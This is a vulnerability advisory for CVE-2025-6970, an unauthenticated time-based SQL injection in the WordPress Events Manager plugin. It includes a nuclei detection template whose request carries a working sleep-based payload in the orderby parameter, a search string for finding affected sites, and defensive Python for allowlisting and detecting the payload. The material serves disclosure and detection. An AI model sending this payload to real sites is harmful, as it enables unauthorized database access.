WordPress Events Manager SQL Injection Vulnerability

Vulnerability Information

Vulnerability name: WordPress Events Manager SQL Injection Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-6970

Vulnerability type: SQL injection

Severity: Critical

Vulnerability description: This vulnerability affects the Events Manager plugin for WordPress, a plugin for managing calendars, bookings, tickets and more that is widely deployed on sites that need event-management functionality. In all versions up to and including 7.0.3, the plugin insufficiently escapes user input supplied in the 'orderby' parameter and does not adequately prepare the existing SQL query, resulting in a time-based SQL injection vulnerability. This allows unauthenticated attackers to append additional SQL queries to the existing query and potentially extract sensitive information from the database. The severity of the vulnerability lies in the fact that it lets unauthenticated attackers execute SQL commands remotely, which may lead to data leakage, service disruption and other security risks. Because the attack requires no authentication and can be automated, it poses a serious threat to sites running affected versions of the plugin.

Vendor: WordPress

Product: Events Manager – Calendar, Bookings, Tickets, and more!

Affected versions: version <= 7.0.3

Search query: /wp-content/plugins/events-manager/

Source: https://github.com/projectdiscovery/nuclei-templates/blob/5faaa4a868ac71d703fe0839897ccb9898a26a42/http%2Fcves%2F2025%2FCVE-2025-6970.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details


```yaml
id: CVE-2025-6970

info:
  name: WordPress Events Manager <= 7.0.3 - Unauthenticated SQL Injection via orderby Parameter
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to time-based SQL Injection via the ‘orderby’ parameter in all versions up to, and including, 7.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  remediation: Fixed in 6.6.5,7.0.4
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6970
    - https://wpscan.com/vulnerability/CVE-2025-6970
    - https://patchstack.com/database/vulnerability/events-manager/wordpress-events-manager-calendar-bookings-tickets-and-more-plugin-7-0-3-unauthenticated-sql-injection-via-orderby-parameter
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-manager/events-manager-703-unauthenticated-sql-injection-via-orderby-parameter
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/events-manager/"
  tags: cve,cve2025,events-manager,sqli,time-based,wordpress,wpscan,wp-plugin,unauth

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=search_events&orderby=1*(select(sleep(5)))

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'em-item-info', 'em-item-title', 'em-item-desc')
          - status_code == 200
          - 'duration>=5'
        condition: and
```
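As an added defensive example (not code from the nuclei template or from the Events Manager plugin), the following Python shows an allowlist validator of the kind that removes this class of bug when a sort column is interpolated into ORDER BY, plus a check over captured admin-ajax.php request bodies that flags the time-based probe shape used by the template above. The column names and the sample bodies are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Hypothetical allowlist of sortable columns; the plugin's real column names are not on the page.
ALLOWED_ORDERBY = {"event_start_date", "event_end_date", "event_name"}
DEFAULT_ORDERBY = "event_start_date"


def sanitize_orderby(value):
    """Allowlist validation for a sort column before it is interpolated into ORDER BY.
    Only an exact allowlist match is returned; anything else falls back to the default,
    so an expression such as 1*(select(sleep(5))) can never reach the query."""
    if value is None:
        return DEFAULT_ORDERBY
    candidate = value.strip().lower()
    return candidate if candidate in ALLOWED_ORDERBY else DEFAULT_ORDERBY


# Indicators of a time-based probe: delay functions, or any non-identifier sort value.
TIME_BASED = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I)
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def flag_request(body):
    """Inspect one admin-ajax.php POST body (WAF / log-review style) and return findings."""
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    if params.get("action", [""])[0] != "search_events":
        return findings  # only the search_events action is relevant to this CVE
    for val in params.get("orderby", []):
        if TIME_BASED.search(val):
            findings.append("time-based SQLi probe in orderby")
        elif not IDENTIFIER.match(val):
            findings.append("non-identifier orderby value")
    return findings


# Constructed sample request bodies for this example.
SAMPLE_BODIES = [
    "action=search_events&orderby=event_start_date",
    "action=search_events&orderby=1*(select(sleep(5)))",
    "action=search_events&orderby=event_name%20desc",
    "action=other&orderby=1*(select(sleep(5)))",
]


def scan(bodies=SAMPLE_BODIES):
    """Map each request body to its findings."""
    return {body: flag_request(body) for body in bodies}
```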